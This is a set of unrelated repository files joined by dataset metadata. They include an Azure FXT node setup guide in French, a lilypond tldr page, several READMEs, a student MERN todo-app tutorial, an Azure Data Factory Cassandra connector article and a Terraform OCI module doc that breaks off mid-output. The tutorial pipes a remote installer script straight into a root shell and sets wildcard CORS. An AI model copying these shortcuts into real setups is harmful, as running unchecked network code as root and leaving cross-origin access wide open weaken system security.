recommends using a BIOS setup password, restricting physical access to the node, and other measures. Learn more at https://aka.ms/fxt-security. Enter new password: ``` Le mot de passe que vous entrez est utilisé pour deux choses : * Il s’agit du mot de passe racine temporaire pour ce nœud Azure FXT Edge Filer. Ce mot de passe change lorsque vous créez un cluster à l’aide de ce nœud, ou lorsque vous ajoutez ce nœud au cluster. Le mot de passe de gestion de cluster (associé à l’utilisateur ``admin``) est également le mot de passe racine de tous les nœuds dans un cluster. * Il s’agit du mot de passe à long terme pour le port de gestion du matériel iDRAC/IPMI. Pensez à mémoriser le mot de passe au cas où vous devez vous connecter avec IPMI ultérieurement pour résoudre un problème matériel. Entrez puis confirmez le mot de passe : ``` Enter new password:********** Re-enter password:********** Loading AvereOS...... ``` Une fois que vous entrez le mot de passe, le système continue le démarrage. Une fois cette opération terminée, le système affiche une invite ``login:``. ## <a name="sign-in-as-root"></a>Se connecter en tant qu’utilisateur racine Connectez-vous en tant que ``root`` avec le mot de passe que vous venez de définir. ``` login: root Password:********** ``` Une fois que vous êtes connecté en tant qu’utilisateur racine, les ports réseau sont actifs et contactent le serveur DHCP pour les adresses IP. ## <a name="next-steps"></a>Étapes suivantes Le nœud est prêt à faire partie d’un cluster. Vous pouvez l’utiliser pour créer le cluster Azure FXT Edge Filer, ou vous pouvez [l’ajouter à un cluster existant](add-nodes.md). > [!div class="nextstepaction"] > [Créer un cluster](cluster-create.md)
48.156028
346
0.75567
fra_Latn
0.982925
539604b6f3e90b2f4c0aa3a6519bd553172a2bac
1,386
md
Markdown
en/common/lilypond.md
reinhart1010/nix
a1803c718ead3b79854b65396c8967bd5ec32874
[ "CC-BY-4.0", "MIT" ]
null
null
null
en/common/lilypond.md
reinhart1010/nix
a1803c718ead3b79854b65396c8967bd5ec32874
[ "CC-BY-4.0", "MIT" ]
null
null
null
en/common/lilypond.md
reinhart1010/nix
a1803c718ead3b79854b65396c8967bd5ec32874
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- layout: page title: common/lilypond (English) description: "Typeset music and/or produce MIDI from file." content_hash: 146522a83e98c9597909656fe35fd87c2ca25d3c --- # lilypond Typeset music and/or produce MIDI from file. More information: <https://lilypond.org>. - Compile a lilypond file into a PDF: `lilypond `<span class="tldr-var badge badge-pill bg-dark-lm bg-white-dm text-white-lm text-dark-dm font-weight-bold">path/to/file</span> - Compile into the specified format: `lilypond --formats=`<span class="tldr-var badge badge-pill bg-dark-lm bg-white-dm text-white-lm text-dark-dm font-weight-bold">format_dump</span>` `<span class="tldr-var badge badge-pill bg-dark-lm bg-white-dm text-white-lm text-dark-dm font-weight-bold">path/to/file</span> - Compile the specified file, suppressing progress updates: `lilypond -s `<span class="tldr-var badge badge-pill bg-dark-lm bg-white-dm text-white-lm text-dark-dm font-weight-bold">path/to/file</span> - Compile the specified file, and also specify the output filename: `lilypond --output=`<span class="tldr-var badge badge-pill bg-dark-lm bg-white-dm text-white-lm text-dark-dm font-weight-bold">path/to/output_file</span>` `<span class="tldr-var badge badge-pill bg-dark-lm bg-white-dm text-white-lm text-dark-dm font-weight-bold">path/to/input_file</span> - Show the current version of lilypond: `lilypond --version`
44.709677
288
0.759019
eng_Latn
0.422273
5396291d1e920e4216d8ac83500d1842d20fb38a
987
md
Markdown
docs/framework/wpf/controls/tooltip-how-to-topics.md
skahack/docs.ja-jp
7f7fac4879f8509f582c3ee008776ae7d4dde227
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/framework/wpf/controls/tooltip-how-to-topics.md
skahack/docs.ja-jp
7f7fac4879f8509f582c3ee008776ae7d4dde227
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/framework/wpf/controls/tooltip-how-to-topics.md
skahack/docs.ja-jp
7f7fac4879f8509f582c3ee008776ae7d4dde227
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: ToolTip に関する「方法」トピック ms.date: 03/30/2017 f1_keywords: - AutoGeneratedOrientationPage helpviewer_keywords: - ToolTip control [WPF], how-to topics - controls [WPF], ToolTip ms.assetid: 2aa88347-c4cb-48d3-951d-a7072643283b ms.openlocfilehash: eb2450d13b7a247e9eb0cc0b802b2d758482c466 ms.sourcegitcommit: 9b552addadfb57fab0b9e7852ed4f1f1b8a42f8e ms.translationtype: MT ms.contentlocale: ja-JP ms.lasthandoff: 04/23/2019 ms.locfileid: "61790697" --- # <a name="tooltip-how-to-topics"></a>ToolTip に関する「方法」トピック ## <a name="in-this-section"></a>このセクションの内容 [ToolTip を配置する](how-to-position-a-tooltip.md) [BetweenShowDelay プロパティを使用する](how-to-use-the-betweenshowdelay-property.md) ## <a name="reference"></a>参照 <xref:System.Windows.Controls.ToolTip> <xref:System.Windows.Controls.ToolTipService> <xref:System.Windows.Controls.Primitives.Popup> ## <a name="related-sections"></a>関連項目 [ポップアップの概要](popup-overview.md) [方法トピック](popup-how-to-topics.md)
29.909091
78
0.751773
yue_Hant
0.587515
53964c1ea277ba914982ddeb406f6552b54cb201
2,705
md
Markdown
README.md
xmlking/koa-router-decorators
fecd4c3f75e264fa42759265ff66e5cfea4b6784
[ "MIT" ]
56
2015-09-30T16:29:55.000Z
2021-07-04T20:20:53.000Z
README.md
xmlking/koa-router-decorators
fecd4c3f75e264fa42759265ff66e5cfea4b6784
[ "MIT" ]
1
2020-01-06T09:22:29.000Z
2020-01-07T07:34:42.000Z
README.md
xmlking/koa-router-decorators
fecd4c3f75e264fa42759265ff66e5cfea4b6784
[ "MIT" ]
16
2015-10-08T08:32:11.000Z
2019-07-31T10:39:05.000Z
# Koa Router Decorators ES7 decorators for koa-router model. ## Installation ```bash $ npm i koa-router-decorators --save ``` ## Usage This library supports [ES7 decorators proposal][decorators-url] which is supported by babel and typescript. To use it with babel you should enable experimental `es7.decorators` feature in babel as described [here][babel-experimental-url]. To use it with typescripts you should enable `experimentalDecorators` and `emitDecoratorMetadata` in `tsconfig.json` ``` @route(path, HttpMethod, ...middleware) optional middlewares are added before the target method. ``` See [trust-broker](https://github.com/xmlking/trust-broker) for more examples ### Example ```js import {route, HttpMethod} from 'koa-router-decorators'; import User from '../models/User' @route('/users') export default class UserController { router:Router; constructor() { return this.router.routes(); } @route('/', HttpMethod.GET, isAdmin) static *index(next) { let query = User.find().skip(0).limit(20); let users = yield query.exec(); let count = yield User.count(); this.body = {users, count}; } @route('/', HttpMethod.POST) static *create(next) { let newUser = new User(this.request.body); let result; try { result = yield newUser.save(); } catch (err) { this.throw( 'DB Error: Unable to save', 500); } this.status = 201; this.body = result } } function *isAdmin(next) { if (!this.state.user.roles.includes('admin')) { throw new AuthorizationError(AuthorizationError.code.FORBIDDEN, {message: 'insufficient role (admin only)'}); } yield next; } ``` **Annotated routes are applied at the end. may overwrite manual added routes if path/method matches.** ```js import koa from 'koa'; import Router from 'koa-router'; import bodyParser from'koa-bodyparser'; import UserController from './controllers/UserController'; rootRouter = new Router({ prefix: '/api' }); app = koa(); app.use(bodyParser()); app.use(new AuthController()); rootRouter.use('/v1', new UserController()); app .use(rootRouter.routes()) .use(rootRouter.allowedMethods()); app.listen(3000); ``` ### Development You need typescript installed globally ```bash npm install -g typescript npm install -g tslint ``` build ```bash npm run compile # or just `tsc` ``` test ```bash npm test # bug : if you see error: remove "pretest": "tsc -p ./test" from package.json and try again. ``` publish to npm registry ```bash npm publish ``` [babel-url]: http://babeljs.io/ [decorators-url]: https://github.com/wycats/javascript-decorators [babel-experimental-url]: https://babeljs.io/docs/usage/experimental/#usage
22.731092
130
0.692791
eng_Latn
0.796537
5396792f96a3d8d50c375190a95c4b690411e5a2
2,454
md
Markdown
plugins/cf-zsh-autocomplete-plugin_norman-abramovitz/README.md
withfig/plugins
199ee45c1cbab6e6e321182ff793f3240fee526f
[ "MIT" ]
19
2022-01-29T03:30:19.000Z
2022-03-30T07:04:08.000Z
plugins/cf-zsh-autocomplete-plugin_norman-abramovitz/README.md
withfig/plugins
199ee45c1cbab6e6e321182ff793f3240fee526f
[ "MIT" ]
4
2022-03-03T20:07:52.000Z
2022-03-30T19:27:39.000Z
plugins/cf-zsh-autocomplete-plugin_norman-abramovitz/README.md
withfig/plugins
199ee45c1cbab6e6e321182ff793f3240fee526f
[ "MIT" ]
3
2022-02-05T01:05:21.000Z
2022-03-24T16:56:55.000Z
# Cloud Foundry CLI zsh complete plugin This [zsh](http://www.zsh.org/) plugin adds autocompletion options for all [Cloud Foundry CLI](http://docs.cloudfoundry.org/devguide/installcf/) commands. ## Demo [![asciicast demo](https://asciinema.org/a/1twq9fo0bazyjtyiln88o9d0u.png)](https://asciinema.org/a/1twq9fo0bazyjtyiln88o9d0u) by [@shinji62](https://github.com/shinji62) ## Installation * Download the latest version of the [Cloud Foundry CLI](https://github.com/cloudfoundry/cli#downloads) * Follow the instructions for your plugin framework of choice: ### Oh-My-Zsh * Clone this repo to your zsh plugins directory: ``` $ cd ~/.oh-my-zsh/plugins $ git clone https://github.com/dannyzen/cf-zsh-autocomplete-plugin.git cf ``` * Add the `cf` plugin to your `.zshrc` file: ``` plugins=(... cf) ``` ### Antigen, Antigen-hs, Antibody ``` antigen bundle dannyzen/cf-zsh-autocomplete-plugin ``` ## Contributing In the spirit of [free software](http://www.fsf.org/licensing/essays/free-sw.html), **everyone** is encouraged to help improve this project. Here are some ways *you* can contribute: * by using alpha, beta, and prerelease versions * by reporting bugs * by suggesting new features * by writing or editing documentation * by writing specifications * by writing code (**no patch is too small**: fix typos, add comments, clean up inconsistent whitespace) * by refactoring code * by closing [issues](https://github.com/dannyzen/cf-zsh-autocomplete-plugin/issues) * by reviewing patches ### Submitting an Issue We use the [GitHub issue tracker](https://github.com/dannyzen/cf-zsh-autocomplete-plugin/issues) to track bugs and features. Before submitting a bug report or feature request, check to make sure it hasn't already been submitted. You can indicate support for an existing issue by voting it up. When submitting a bug report, please include a [Gist](http://gist.github.com/) that includes a stack trace and any details that may be necessary to reproduce the bug, including your gem version, Ruby version, and operating system. Ideally, a bug report should include a pull request with failing specs. ### Submitting a Pull Request 1. Fork the project. 2. Create a topic branch. 3. Implement your feature or bug fix. 4. Commit and push your changes. 5. Submit a pull request. ## Copyright Copyright (c) 2015 Ferran Rodenas. See [LICENSE](https://github.com/dannyzen/cf-zsh-autocomplete-plugin/blob/master/LICENSE) for details.
34.56338
169
0.756316
eng_Latn
0.953401
5396a59c63af85aaba24a9360138c6dc5081eb20
6,160
md
Markdown
Project3.md
Demiladee/Demilade-Project3
8f177bbed3decc9f6138848efc97013bd7f2244d
[ "MIT" ]
null
null
null
Project3.md
Demiladee/Demilade-Project3
8f177bbed3decc9f6138848efc97013bd7f2244d
[ "MIT" ]
null
null
null
Project3.md
Demiladee/Demilade-Project3
8f177bbed3decc9f6138848efc97013bd7f2244d
[ "MIT" ]
null
null
null
# Project 3 **Backend Configuration** ___ updating ubuntu ` $ sudo apt update` ![](images/updateubuntu1.png) upgrading ubuntu ` $ sudo apt upgrade` ![](images/ubuntuupgrade2.png) getting nodejs location from ubuntu repositories ` $ curl -sL https://deb.nodesource.com/setup_12.x | sudo -E bash -` ![](images/nodejslocation3.png) installing nodejs & npm on the server ` $ sudo apt-get install -y nodejs` verifying node installation ` $ node -v` verifying npm installation ` $ npm -v` ![](images/installnverify4.png) **application code setup** creating a new directory for the todo project ` $ mkdir Todo` verifying todo directory ` $ ls` changing directory to newly created one ` $ cd Todo` ![](images/nwdirnchdir5.png) initializing project so package.json will be created ` $ npm init` ![](images/npminit6.png) confirmation ![](images/confirmation7.png) installing expressjs ` $ npm install express` creating index.js file ` $ touch index.js` installing dotenv module ` $ npm install dotenv` opening index.js file ` $ vim index.js` ![](images/express2vim8.png) inside index.js ![](images/barebones9.png) testing to see if server works - it should work on port 5000 ` $ node index.js` ![](images/nodeconf10.png) opening TCP port 5000 in EC2 security group ![](images/5000tcp11.png) running public ip + port 5000 ![](images/welcome2express12.png) **routes** creating routes directory ` $ mkdir routes` ` $ cd routes` create api.js file ` $ touch api.js` open api.js file ` $ vi api.js` ![](images/routes2api13.png) ![](images/apibarebones14.png) **models** *installing mongoose - a nodejs package - that makes working with mongodb easier* change directory back to todo folder ` $ npm install mongoose` create directory - models, cd into models and create todo.js file ` $ mkdir models && cd models && touch todo.js` open todo.js ` $ vim todo.js` ![](images/mongoose2vim15.png) ![](images/todojsvim16.png) updating the code in the api.js file - within routes directory `$ cd routes` ` $ vim api.js` ![](images/chngroutes17.png) **mongodb database** creating cluster ![](images/mongodbcluster18.png) setting up network access ![](images/networkaccess19.png) creating mongodb database and collection inside mlab ![](images/demiladedatabase20.png) going back to todo directory to create .env file to access environment variables ` $ touch .env` ` $ vi .env` add this connection string to access the database ` $ DB = 'mongodb+srv://<username>:<password>@<network-address>/<dbname>?retryWrites=true&w=majority'` updating index.js to reflect the use of .env so nodejs can connect to the database ` $ vim index.js` delete the previous code paste this: ` $ const express = require('express'); const bodyParser = require('body-parser'); const mongoose = require('mongoose'); const routes = require('./routes/api'); const path = require('path'); require('dotenv').config(); const app = express(); const port = process.env.PORT || 5000; //connect to the database mongoose.connect(process.env.DB, { useNewUrlParser: true, useUnifiedTopology: true }) .then(() => console.log(`Database connected successfully`)) .catch(err => console.log(err)); //since mongoose promise is depreciated, we overide it with node's promise mongoose.Promise = global.Promise; app.use((req, res, next) => { res.header("Access-Control-Allow-Origin", "\*"); res.header("Access-Control-Allow-Headers", "Origin, X-Requested-With, Content-Type, Accept"); next(); }); app.use(bodyParser.json()); app.use('/api', routes); app.use((err, req, res, next) => { console.log(err); next(); }); app.listen(port, () => { console.log(`Server running on port ${port}`) });` start server using: ` $ node index.js` ![](images/env2fixserver21.png) ##### Database connected successfully means the backend is configured **testing backend code without frontend using RESTful API** i used postman to test my api **POST request** Header: Content-Type Value: Applicatiion/json ![](images/POST22.png) **GET request** Header: Content-Type Value: Application/json ![](images/GET23.png) **DELETE request** Header: Content-Type Value: Application/json ![](images/DEL24.png) **POST request again** Header: Content-Type Value: Application/json ![](images/POSTAGAIN25.png) **frontend creation** using *create-react-app* command to scaffold app ` $ npx create-react-app client` ![](images/reactclient26.png) **running a react app** installing concurrently ` $ npm install concurrently --save-dev` installing nodemon ` $ npm install nodemon --save-dev` open package.json file and change a part of the code ![](images/conc2vi27.png) ![](images/changingjsoncode28.png) **configuring proxy in package.json** changing directory to client ` $ cd client` opening package.json file ` $ vi package.json` add the key value pair to the file: "proxy": "http://localhost:5000" ![](images/localhost29.png) go back todo directory and run: ` $ npm run dev` the app should run on localhost:3000 ![](images/rundev30.png) to access the application via the internet i opened tcp port 3000 on ec2 ![](images/3000port31.png) **creating react components** move to src directory ` $ cd src` create components directory ` $ mkdir components` ` $ cd components` create Input.js, ListTodo.js and Todo.js in components ` $ touch Input.js ListTodo.js Todo.js` ` $ vi Input.js` move back to client directory ` cd ..` install axios ` $ npm install axios` ![](images/src2axios32.png) ![](images/indexjs33.png) move to components directory ` $ cd src/components` open listtodo.js ` $ vi ListTodo.js` open todo.js ` $ Todo.js` adjusting react code...deleting logo & adjusting app.js move back to src directory ` $ cd ..` open app.js ` $ vi app.js` open app.css ` $ vi app.css` open index.css ` $ vim index.css` move back to todo directory ` $ cd ../..` in the todo directory run: ` $ npm run dev` ![](images/src2rundev34.png) ![](images/listtodo35.png) ![](images/vitodo36.png) ![](images/appjs37.png) ![](images/appcss38.png) ![](images/indexcss39.png) ![](images/final40.png)
15.6743
102
0.707143
eng_Latn
0.665312
53977786dc7614fba257b833bfe5e9c155677360
12,975
md
Markdown
articles/data-factory/connector-cassandra.md
BaherAbdullah/azure-docs
65d82440dd3209697fdb983ef456b0a2293e270a
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/data-factory/connector-cassandra.md
BaherAbdullah/azure-docs
65d82440dd3209697fdb983ef456b0a2293e270a
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/data-factory/connector-cassandra.md
BaherAbdullah/azure-docs
65d82440dd3209697fdb983ef456b0a2293e270a
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: Copy data from Cassandra using Azure Data Factory titleSuffix: Azure Data Factory & Azure Synapse description: Learn how to copy data from Cassandra to supported sink data stores by using a copy activity in an Azure Data Factory pipeline. author: jianleishen ms.service: data-factory ms.subservice: data-movement ms.custom: synapse ms.topic: conceptual ms.date: 08/30/2021 ms.author: jianleishen --- # Copy data from Cassandra using Azure Data Factory > [!div class="op_single_selector" title1="Select the version of Data Factory service you are using:"] > * [Version 1](v1/data-factory-onprem-cassandra-connector.md) > * [Current version](connector-cassandra.md) [!INCLUDE[appliesto-adf-asa-md](includes/appliesto-adf-asa-md.md)] This article outlines how to use the Copy Activity in Azure Data Factory to copy data from a Cassandra database. It builds on the [copy activity overview](copy-activity-overview.md) article that presents a general overview of copy activity. ## Supported capabilities This Cassandra connector is supported for the following activities: - [Copy activity](copy-activity-overview.md) with [supported source/sink matrix](copy-activity-overview.md) - [Lookup activity](control-flow-lookup-activity.md) You can copy data from Cassandra database to any supported sink data store. For a list of data stores that are supported as sources/sinks by the copy activity, see the [Supported data stores](copy-activity-overview.md#supported-data-stores-and-formats) table. Specifically, this Cassandra connector supports: - Cassandra **versions 2.x and 3.x**. - Copying data using **Basic** or **Anonymous** authentication. >[!NOTE] >For activity running on Self-hosted Integration Runtime, Cassandra 3.x is supported since IR version 3.7 and above. ## Prerequisites [!INCLUDE [data-factory-v2-integration-runtime-requirements](includes/data-factory-v2-integration-runtime-requirements.md)] The Integration Runtime provides a built-in Cassandra driver, therefore you don't need to manually install any driver when copying data from/to Cassandra. ## Getting started [!INCLUDE [data-factory-v2-connector-get-started](includes/data-factory-v2-connector-get-started.md)] ## Create a linked service to Cassandra using UI Use the following steps to create a linked service to Cassandra in the Azure portal UI. 1. Browse to the Manage tab in your Azure Data Factory or Synapse workspace and select Linked Services, then click New: # [Azure Data Factory](#tab/data-factory) :::image type="content" source="media/doc-common-process/new-linked-service.png" alt-text="Screenshot of creating a new linked service with Azure Data Factory UI."::: # [Azure Synapse](#tab/synapse-analytics) :::image type="content" source="media/doc-common-process/new-linked-service-synapse.png" alt-text="Screenshot of creating a new linked service with Azure Synapse UI."::: 2. Search for Cassandra and select the Cassandra connector. :::image type="content" source="media/connector-cassandra/cassandra-connector.png" alt-text="Screenshot of the Cassandra connector."::: 1. Configure the service details, test the connection, and create the new linked service. :::image type="content" source="media/connector-cassandra/configure-cassandra-linked-service.png" alt-text="Screenshot of linked service configuration for Cassandra."::: ## Connector configuration details The following sections provide details about properties that are used to define Data Factory entities specific to Cassandra connector. ## Linked service properties The following properties are supported for Cassandra linked service: | Property | Description | Required | |:--- |:--- |:--- | | type |The type property must be set to: **Cassandra** |Yes | | host |One or more IP addresses or host names of Cassandra servers.<br/>Specify a comma-separated list of IP addresses or host names to connect to all servers concurrently. |Yes | | port |The TCP port that the Cassandra server uses to listen for client connections. |No (default is 9042) | | authenticationType | Type of authentication used to connect to the Cassandra database.<br/>Allowed values are: **Basic**, and **Anonymous**. |Yes | | username |Specify user name for the user account. |Yes, if authenticationType is set to Basic. | | password |Specify password for the user account. Mark this field as a SecureString to store it securely in Data Factory, or [reference a secret stored in Azure Key Vault](store-credentials-in-key-vault.md). |Yes, if authenticationType is set to Basic. | | connectVia | The [Integration Runtime](concepts-integration-runtime.md) to be used to connect to the data store. Learn more from [Prerequisites](#prerequisites) section. If not specified, it uses the default Azure Integration Runtime. |No | >[!NOTE] >Currently connection to Cassandra using TLS is not supported. **Example:** ```json { "name": "CassandraLinkedService", "properties": { "type": "Cassandra", "typeProperties": { "host": "<host>", "authenticationType": "Basic", "username": "<username>", "password": { "type": "SecureString", "value": "<password>" } }, "connectVia": { "referenceName": "<name of Integration Runtime>", "type": "IntegrationRuntimeReference" } } } ``` ## Dataset properties For a full list of sections and properties available for defining datasets, see the [datasets](concepts-datasets-linked-services.md) article. This section provides a list of properties supported by Cassandra dataset. To copy data from Cassandra, set the type property of the dataset to **CassandraTable**. The following properties are supported: | Property | Description | Required | |:--- |:--- |:--- | | type | The type property of the dataset must be set to: **CassandraTable** | Yes | | keyspace |Name of the keyspace or schema in Cassandra database. |No (if "query" for "CassandraSource" is specified) | | tableName |Name of the table in Cassandra database. |No (if "query" for "CassandraSource" is specified) | **Example:** ```json { "name": "CassandraDataset", "properties": { "type": "CassandraTable", "typeProperties": { "keySpace": "<keyspace name>", "tableName": "<table name>" }, "schema": [], "linkedServiceName": { "referenceName": "<Cassandra linked service name>", "type": "LinkedServiceReference" } } } ``` ## Copy activity properties For a full list of sections and properties available for defining activities, see the [Pipelines](concepts-pipelines-activities.md) article. This section provides a list of properties supported by Cassandra source. ### Cassandra as source To copy data from Cassandra, set the source type in the copy activity to **CassandraSource**. The following properties are supported in the copy activity **source** section: | Property | Description | Required | |:--- |:--- |:--- | | type | The type property of the copy activity source must be set to: **CassandraSource** | Yes | | query |Use the custom query to read data. SQL-92 query or CQL query. See [CQL reference](https://docs.datastax.com/en/cql/3.1/cql/cql_reference/cqlReferenceTOC.html). <br/><br/>When using SQL query, specify **keyspace name.table name** to represent the table you want to query. |No (if "tableName" and "keyspace" in dataset are specified). | | consistencyLevel |The consistency level specifies how many replicas must respond to a read request before returning data to the client application. Cassandra checks the specified number of replicas for data to satisfy the read request. See [Configuring data consistency](https://docs.datastax.com/en/cassandra/2.1/cassandra/dml/dml_config_consistency_c.html) for details.<br/><br/>Allowed values are: **ONE**, **TWO**, **THREE**, **QUORUM**, **ALL**, **LOCAL_QUORUM**, **EACH_QUORUM**, and **LOCAL_ONE**. |No (default is `ONE`) | **Example:** ```json "activities":[ { "name": "CopyFromCassandra", "type": "Copy", "inputs": [ { "referenceName": "<Cassandra input dataset name>", "type": "DatasetReference" } ], "outputs": [ { "referenceName": "<output dataset name>", "type": "DatasetReference" } ], "typeProperties": { "source": { "type": "CassandraSource", "query": "select id, firstname, lastname from mykeyspace.mytable" }, "sink": { "type": "<sink type>" } } } ] ``` ## Data type mapping for Cassandra When copying data from Cassandra, the following mappings are used from Cassandra data types to Azure Data Factory interim data types. See [Schema and data type mappings](copy-activity-schema-and-type-mapping.md) to learn about how copy activity maps the source schema and data type to the sink. | Cassandra data type | Data factory interim data type | |:--- |:--- | | ASCII |String | | BIGINT |Int64 | | BLOB |Byte[] | | BOOLEAN |Boolean | | DECIMAL |Decimal | | DOUBLE |Double | | FLOAT |Single | | INET |String | | INT |Int32 | | TEXT |String | | TIMESTAMP |DateTime | | TIMEUUID |Guid | | UUID |Guid | | VARCHAR |String | | VARINT |Decimal | > [!NOTE] > For collection types (map, set, list, etc.), refer to [Work with Cassandra collection types using virtual table](#work-with-collections-using-virtual-table) section. > > User-defined types are not supported. > > The length of Binary Column and String Column lengths cannot be greater than 4000. > ## Work with collections using virtual table Azure Data Factory uses a built-in ODBC driver to connect to and copy data from your Cassandra database. For collection types including map, set and list, the driver renormalizes the data into corresponding virtual tables. Specifically, if a table contains any collection columns, the driver generates the following virtual tables: * A **base table**, which contains the same data as the real table except for the collection columns. The base table uses the same name as the real table that it represents. * A **virtual table** for each collection column, which expands the nested data. The virtual tables that represent collections are named using the name of the real table, a separator "*vt*" and the name of the column. Virtual tables refer to the data in the real table, enabling the driver to access the denormalized data. See Example section for details. You can access the content of Cassandra collections by querying and joining the virtual tables. ### Example For example, the following "ExampleTable" is a Cassandra database table that contains an integer primary key column named "pk_int", a text column named value, a list column, a map column, and a set column (named "StringSet"). | pk_int | Value | List | Map | StringSet | | --- | --- | --- | --- | --- | | 1 |"sample value 1" |["1", "2", "3"] |{"S1": "a", "S2": "b"} |{"A", "B", "C"} | | 3 |"sample value 3" |["100", "101", "102", "105"] |{"S1": "t"} |{"A", "E"} | The driver would generate multiple virtual tables to represent this single table. The foreign key columns in the virtual tables reference the primary key columns in the real table, and indicate which real table row the virtual table row corresponds to. The first virtual table is the base table named "ExampleTable" is shown in the following table: | pk_int | Value | | --- | --- | | 1 |"sample value 1" | | 3 |"sample value 3" | The base table contains the same data as the original database table except for the collections, which are omitted from this table and expanded in other virtual tables. The following tables show the virtual tables that renormalize the data from the List, Map, and StringSet columns. The columns with names that end with "_index" or "_key" indicate the position of the data within the original list or map. The columns with names that end with "_value" contain the expanded data from the collection. **Table "ExampleTable_vt_List":** | pk_int | List_index | List_value | | --- | --- | --- | | 1 |0 |1 | | 1 |1 |2 | | 1 |2 |3 | | 3 |0 |100 | | 3 |1 |101 | | 3 |2 |102 | | 3 |3 |103 | **Table "ExampleTable_vt_Map":** | pk_int | Map_key | Map_value | | --- | --- | --- | | 1 |S1 |A | | 1 |S2 |b | | 3 |S1 |t | **Table "ExampleTable_vt_StringSet":** | pk_int | StringSet_value | | --- | --- | | 1 |A | | 1 |B | | 1 |C | | 3 |A | | 3 |E | ## Lookup activity properties To learn details about the properties, check [Lookup activity](control-flow-lookup-activity.md). ## Next steps For a list of data stores supported as sources and sinks by the copy activity in Azure Data Factory, see [supported data stores](copy-activity-overview.md#supported-data-stores-and-formats).
44.283276
531
0.70343
eng_Latn
0.968641
5397a6296c63e6385c082b6b0010e525abd429c7
476
markdown
Markdown
README.markdown
btedev/comma
96b067e4b246b8e79011b225a88beb2d7ded135d
[ "MIT" ]
1
2016-05-09T12:26:50.000Z
2016-05-09T12:26:50.000Z
README.markdown
btedev/comma
96b067e4b246b8e79011b225a88beb2d7ded135d
[ "MIT" ]
null
null
null
README.markdown
btedev/comma
96b067e4b246b8e79011b225a88beb2d7ded135d
[ "MIT" ]
null
null
null
= COMMA [http://github.com/btedev/comma] (http://github.com/btedev/comma) == DESCRIPTION: Please read full documentation of crafterm's Comma at [http://github.com/crafterm/comma](http://github.com/crafterm/comma) Original library exports file using the method name for the filename with no extension. btedev added ability to customize the filename as such: render :csv => contracts, :filename => "transactions.csv" If no :filename specified, the default is "report.csv"
31.733333
143
0.762605
eng_Latn
0.860737
53980311d738987c1e84c0eded92b782dbf8b8f3
6,112
md
Markdown
oci/r/oci_core_ipsec_connection_tunnel_management.md
chrisjaimon2012/tfwriter
1ea629ed386bbe6a8f21617a430dae19ba536a98
[ "MIT" ]
78
2021-01-15T14:10:30.000Z
2022-02-14T09:17:40.000Z
oci/r/oci_core_ipsec_connection_tunnel_management.md
chrisjaimon2012/tfwriter
1ea629ed386bbe6a8f21617a430dae19ba536a98
[ "MIT" ]
5
2021-04-09T15:21:28.000Z
2022-01-28T19:02:05.000Z
oci/r/oci_core_ipsec_connection_tunnel_management.md
chrisjaimon2012/tfwriter
1ea629ed386bbe6a8f21617a430dae19ba536a98
[ "MIT" ]
30
2021-01-17T13:16:57.000Z
2022-03-21T12:52:08.000Z
# oci_core_ipsec_connection_tunnel_management [back](../oci.md) ### Index - [Example Usage](#example-usage) - [Variables](#variables) - [Resource](#resource) - [Outputs](#outputs) ### Terraform ```terraform terraform { required_providers { oci = ">= 4.21.0" } } ``` [top](#index) ### Example Usage ```terraform module "oci_core_ipsec_connection_tunnel_management" { source = "./modules/oci/r/oci_core_ipsec_connection_tunnel_management" # display_name - (optional) is a type of string display_name = null # ike_version - (optional) is a type of string ike_version = null # ipsec_id - (required) is a type of string ipsec_id = null # routing - (required) is a type of string routing = null # shared_secret - (optional) is a type of string shared_secret = null # tunnel_id - (required) is a type of string tunnel_id = null bgp_session_info = [{ bgp_state = null customer_bgp_asn = null customer_interface_ip = null oracle_bgp_asn = null oracle_interface_ip = null }] encryption_domain_config = [{ cpe_traffic_selector = [] oracle_traffic_selector = [] }] timeouts = [{ create = null delete = null update = null }] } ``` [top](#index) ### Variables ```terraform variable "display_name" { description = "(optional)" type = string default = null } variable "ike_version" { description = "(optional)" type = string default = null } variable "ipsec_id" { description = "(required)" type = string } variable "routing" { description = "(required)" type = string } variable "shared_secret" { description = "(optional)" type = string default = null } variable "tunnel_id" { description = "(required)" type = string } variable "bgp_session_info" { description = "nested block: NestingList, min items: 0, max items: 0" type = set(object( { bgp_state = string customer_bgp_asn = string customer_interface_ip = string oracle_bgp_asn = string oracle_interface_ip = string } )) default = [] } variable "encryption_domain_config" { description = "nested block: NestingList, min items: 0, max items: 1" type = set(object( { cpe_traffic_selector = list(string) oracle_traffic_selector = list(string) } )) default = [] } variable "timeouts" { description = "nested block: NestingSingle, min items: 0, max items: 0" type = set(object( { create = string delete = string update = string } )) default = [] } ``` [top](#index) ### Resource ```terraform resource "oci_core_ipsec_connection_tunnel_management" "this" { # display_name - (optional) is a type of string display_name = var.display_name # ike_version - (optional) is a type of string ike_version = var.ike_version # ipsec_id - (required) is a type of string ipsec_id = var.ipsec_id # routing - (required) is a type of string routing = var.routing # shared_secret - (optional) is a type of string shared_secret = var.shared_secret # tunnel_id - (required) is a type of string tunnel_id = var.tunnel_id dynamic "bgp_session_info" { for_each = var.bgp_session_info content { # customer_bgp_asn - (optional) is a type of string customer_bgp_asn = bgp_session_info.value["customer_bgp_asn"] # customer_interface_ip - (optional) is a type of string customer_interface_ip = bgp_session_info.value["customer_interface_ip"] # oracle_interface_ip - (optional) is a type of string oracle_interface_ip = bgp_session_info.value["oracle_interface_ip"] } } dynamic "encryption_domain_config" { for_each = var.encryption_domain_config content { # cpe_traffic_selector - (optional) is a type of list of string cpe_traffic_selector = encryption_domain_config.value["cpe_traffic_selector"] # oracle_traffic_selector - (optional) is a type of list of string oracle_traffic_selector = encryption_domain_config.value["oracle_traffic_selector"] } } dynamic "timeouts" { for_each = var.timeouts content { # create - (optional) is a type of string create = timeouts.value["create"] # delete - (optional) is a type of string delete = timeouts.value["delete"] # update - (optional) is a type of string update = timeouts.value["update"] } } } ``` [top](#index) ### Outputs ```terraform output "compartment_id" { description = "returns a string" value = oci_core_ipsec_connection_tunnel_management.this.compartment_id } output "cpe_ip" { description = "returns a string" value = oci_core_ipsec_connection_tunnel_management.this.cpe_ip } output "display_name" { description = "returns a string" value = 